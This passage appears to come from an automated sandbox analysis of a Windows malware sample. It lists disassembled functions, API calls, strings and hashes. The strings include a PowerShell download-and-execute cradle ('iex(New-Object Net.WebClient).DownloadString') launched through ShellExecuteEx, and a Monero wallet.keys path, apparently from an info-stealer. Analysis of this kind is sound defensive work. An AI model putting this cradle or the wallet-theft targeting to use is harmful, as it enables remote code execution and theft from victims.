                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 53dc07de54b9a5accb011eb7c04d40116926a9f215006713598c52ab4277ffdf
                              • Instruction ID: 4e0d799dd4a87baa7df1f1441025a0d35caa64247e662fd109c9befda34e5c72
                              • Opcode Fuzzy Hash: 53dc07de54b9a5accb011eb7c04d40116926a9f215006713598c52ab4277ffdf
                              • Instruction Fuzzy Hash: 58310AB4A00209EFDB14DFA4C985FEE77B9FF48740F108158E915A7290D778A942CFA1
                              Function 001C4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,00EEDEE8), ref: 001C47DB
                                • Part of subcall function 001C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001C4801
                              • lstrcat.KERNEL32(?,?), ref: 001C4820
                              • lstrcat.KERNEL32(?,?), ref: 001C4834
                              • lstrcat.KERNEL32(?,00EDB058), ref: 001C4847
                              • lstrcat.KERNEL32(?,?), ref: 001C485B
                              • lstrcat.KERNEL32(?,00EED600), ref: 001C486F
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001C8D90: GetFileAttributesA.KERNEL32(00000000,?,001B1B54,?,?,001D564C,?,?,001D0E1F), ref: 001C8D9F
                                • Part of subcall function 001C4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001C4580
                                • Part of subcall function 001C4570: RtlAllocateHeap.NTDLL(00000000), ref: 001C4587
                                • Part of subcall function 001C4570: wsprintfA.USER32 ref: 001C45A6
                                • Part of subcall function 001C4570: FindFirstFileA.KERNEL32(?,?), ref: 001C45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: a952b4ecd9f41e86bc6a2aab4500bdf4a23265db83ced99b3d48f098da27c792
                              • Instruction ID: a3c089fdd7471fb47c2526a574ab3c3730f1dbc27c340b37aad5f74cab8defcc
                              • Opcode Fuzzy Hash: a952b4ecd9f41e86bc6a2aab4500bdf4a23265db83ced99b3d48f098da27c792
                              • Instruction Fuzzy Hash: D2315DB2900218A7CB11FBA0DC85FE9737CAB68704F404589B35996081EFB5E689CB96
                              Function 001C2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001C2D85
                              Strings
                              • ')", xrefs: 001C2CB3
                              • <, xrefs: 001C2D39
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 001C2CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 001C2D04
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 271e1ef33b1c43592d022a61782e840882acfac80469707df69980ee3c104d51
                              • Instruction ID: b8da3986185bc24e79267d1716d631d82aee9453c91c08ed8213440454f8681a
                              • Opcode Fuzzy Hash: 271e1ef33b1c43592d022a61782e840882acfac80469707df69980ee3c104d51
                              • Instruction Fuzzy Hash: F941CD71C5020C9BDB16EBA0D896FEDB774AF34304F90411DE016A7191DF74AA4ACF96
                              Function 001B9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 001B9F41
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 27d7ce1743e0508c17d7d3af52925e3cddde56bc6d83f79893c1fb030f7f74f8
                              • Instruction ID: 10ecf4c854899382462334c0decebf325e4ef1d3a8777498936fb047d39a9b1b
                              • Opcode Fuzzy Hash: 27d7ce1743e0508c17d7d3af52925e3cddde56bc6d83f79893c1fb030f7f74f8
                              • Instruction Fuzzy Hash: 0261207190024CEBDB25EFA4CC96FED7775AF65304F808118F90A9F191DB74AA06CB52
                              Function 001C40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,00EED460,00000000,00020119,?), ref: 001C40F4
                              • RegQueryValueExA.ADVAPI32(?,00EEDF78,00000000,00000000,00000000,000000FF), ref: 001C4118
                              • RegCloseKey.ADVAPI32(?), ref: 001C4122
                              • lstrcat.KERNEL32(?,00000000), ref: 001C4147
                              • lstrcat.KERNEL32(?,00EEDDE0), ref: 001C415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 17970ad474612e9265858fd9dd2d1ffdf1e07aaf96258f3349f72df0b4ca83f4
                              • Instruction ID: be5018aac9d3436d8c57e1e858fa0e850b6e7ee67535328966f7688847c1b58b
                              • Opcode Fuzzy Hash: 17970ad474612e9265858fd9dd2d1ffdf1e07aaf96258f3349f72df0b4ca83f4
                              • Instruction Fuzzy Hash: 3C41EBB6D001086BDB25EBA0DC56FFE773DAB98300F40855CB61957181EB759B88CBE2
                              Function 001C7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,00EDB838,00000000,00020119,?), ref: 001C7E5E
                              • RegQueryValueExA.ADVAPI32(?,00EED440,00000000,00000000,000000FF,000000FF), ref: 001C7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 001C7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: dc6000a118b341fcedd57728e23554ea3e7032158f5d33c739d65c90fb316120
                              • Instruction ID: 6b9b9b9f21ed8e5231e6dd63f9c2307355e19c85dea97e64345e4dd47aaac9d3
                              • Opcode Fuzzy Hash: dc6000a118b341fcedd57728e23554ea3e7032158f5d33c739d65c90fb316120
                              • Instruction Fuzzy Hash: E0114CB2A44605EBD705DB95DD49FBBBBBCEB08B10F104159F609A7280D7B49800CBA1
                              Function 001C9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(00EEDAE0,?,?,?,001C140C,?,00EEDAE0,00000000), ref: 001C926C
                              • lstrcpyn.KERNEL32(003FAB88,00EEDAE0,00EEDAE0,?,001C140C,?,00EEDAE0), ref: 001C9290
                              • lstrlen.KERNEL32(?,?,001C140C,?,00EEDAE0), ref: 001C92A7
                              • wsprintfA.USER32 ref: 001C92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 1f04583da265bf59bf597e7117e94afb8e35be51f3d632f0125d542e7505426c
                              • Instruction ID: 909bc4839c92bd3bc558a3b6bb9609994266187e823e136ea555b79189119977
                              • Opcode Fuzzy Hash: 1f04583da265bf59bf597e7117e94afb8e35be51f3d632f0125d542e7505426c
                              • Instruction Fuzzy Hash: E301A5B5500608FFCB05DFE8CA98EAE7BB9EB48354F108148F9099B244C671AE41DB95
                              Function 001B12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001B12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001B12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001B12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001B12F5
                              • RegCloseKey.ADVAPI32(?), ref: 001B12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 80d017cd152540fdfe6937a38d3ba0f571ace686d5fa4d2fc75191f97b1e033a
                              • Instruction ID: d8e88f02652a1a72db5524da9469c4d1f8c6f05cdbb394e81c4af53b8476b2eb
                              • Opcode Fuzzy Hash: 80d017cd152540fdfe6937a38d3ba0f571ace686d5fa4d2fc75191f97b1e033a
                              • Instruction Fuzzy Hash: 97011DB9A40208BBDB00DFE0DC49FAEBBBCEB48701F108159FA0997280D670AA05CB51
                              Function 001CC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: abc16ae03fd07f894c924887ff0a95140e863d8c5d28d387747800ff4811c6c7
                              • Instruction ID: 264f33454c0768800709d20f19436da59a695e531a579fdfd2bd1c8121c12012
                              • Opcode Fuzzy Hash: abc16ae03fd07f894c924887ff0a95140e863d8c5d28d387747800ff4811c6c7
                              • Instruction Fuzzy Hash: 2041E5B110079C5EDB258B24CC95FFB7BE89B65708F1444ACE98A86182E371DE45CFA0
                              Function 001C6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 001C6663
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001C6726
                              • ExitProcess.KERNEL32 ref: 001C6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: da6c3edc496b679b87022b7abdf463e3774bc826c86e85cd5ccf6070305a64f9
                              • Instruction ID: e37ddbd0a9f17799b33ecda50dd35c04de92a53705d26883e656c8408f2ebe0e
                              • Opcode Fuzzy Hash: da6c3edc496b679b87022b7abdf463e3774bc826c86e85cd5ccf6070305a64f9
                              • Instruction Fuzzy Hash: 83312DB1801218ABDB15EB90DC96FED777CAF64304F804189F20966191DF74AB48CF5A
                              Function 001C87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001D0E28,00000000,?), ref: 001C882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C8836
                              • wsprintfA.USER32 ref: 001C8850
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
